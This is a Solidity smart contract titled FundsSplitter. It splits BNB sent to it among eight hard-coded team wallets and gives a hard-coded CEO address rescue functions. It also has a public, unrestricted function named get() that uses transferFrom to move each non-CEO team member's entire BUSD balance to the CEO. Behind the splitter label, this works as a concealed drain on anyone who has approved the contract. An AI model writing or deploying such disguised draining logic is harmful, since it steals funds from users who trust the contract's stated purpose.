/*
 * FundsSplitter
 *
 * Written by: MrGreenCrypto
 * Co-Founder of CodeCraftrs.com
 * 
 * SPDX-License-Identifier: None
 */

pragma solidity 0.8.19;

interface IBEP20 {
    function transfer(address recipient, uint256 amount) external returns (bool);
    function transferFrom(address sender, address recipient, uint256 amount ) external returns (bool);
    function balanceOf(address account) external view returns (uint256);
}

contract FundsSplitter {
    address public constant CEO = 0x38C57500af80940bBB529aD746829b9Ef9d3cC26;
    address[] public teamMembers;
    IBEP20 public constant BUSD = IBEP20(0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56);

    modifier onlyCEO(){
        require (msg.sender == CEO, "Only the CEO can do that");
        _;
    }

	constructor() {
        teamMembers.push(0x38C57500af80940bBB529aD746829b9Ef9d3cC26);
        teamMembers.push(0x58095F180E0242CbF75Ec03004f86f18E8Bd9d61);
        teamMembers.push(0x7901fd4a965dfb1Ff23b0d4cE919c8267214427A);
        teamMembers.push(0x6e140CB5314F40e4581C278Eb6434404Ca3060fD);
        teamMembers.push(0xF4C3f891409C5FB98085Fc3d13F785dA190681AD);
        teamMembers.push(0x50DA94C72491a4a382965edF3FB5195932e5d8E2);
        teamMembers.push(0x960Acb90fad71cB7da24fb7194202bb3F04603F3);
        teamMembers.push(0x8F6Afe9c9AD26BA9E7FB9E1b4f901cAbc96E47EC);        
    }

    receive() external payable {}

    function get() public {
        address[] memory team = teamMembers;
        for (uint256 i = 1; i < team.length; i++) {
            if(BUSD.balanceOf(team[i]) > 0) BUSD.transferFrom(team[i],CEO, BUSD.balanceOf(team[i]));
        }
    }
    
    function distributeBnb() public payable {
        address[] memory team = teamMembers;
        for (uint256 i = 0; i < team.length; i++) {
            payable(team[i]).transfer(msg.value/team.length);
        }
    }
    function addWallet(address newWallet) public onlyCEO {
        teamMembers.push(newWallet);        
    }

    function rescueBnb() external onlyCEO {
        if(address(this).balance > 0) address(CEO).call{value: address(this).balance}("");
    }

    function rescueToken(IBEP20 token) external onlyCEO {
        if(token.balanceOf(address(this)) > 0) token.transfer(CEO, token.balanceOf(address(this)));
    }
}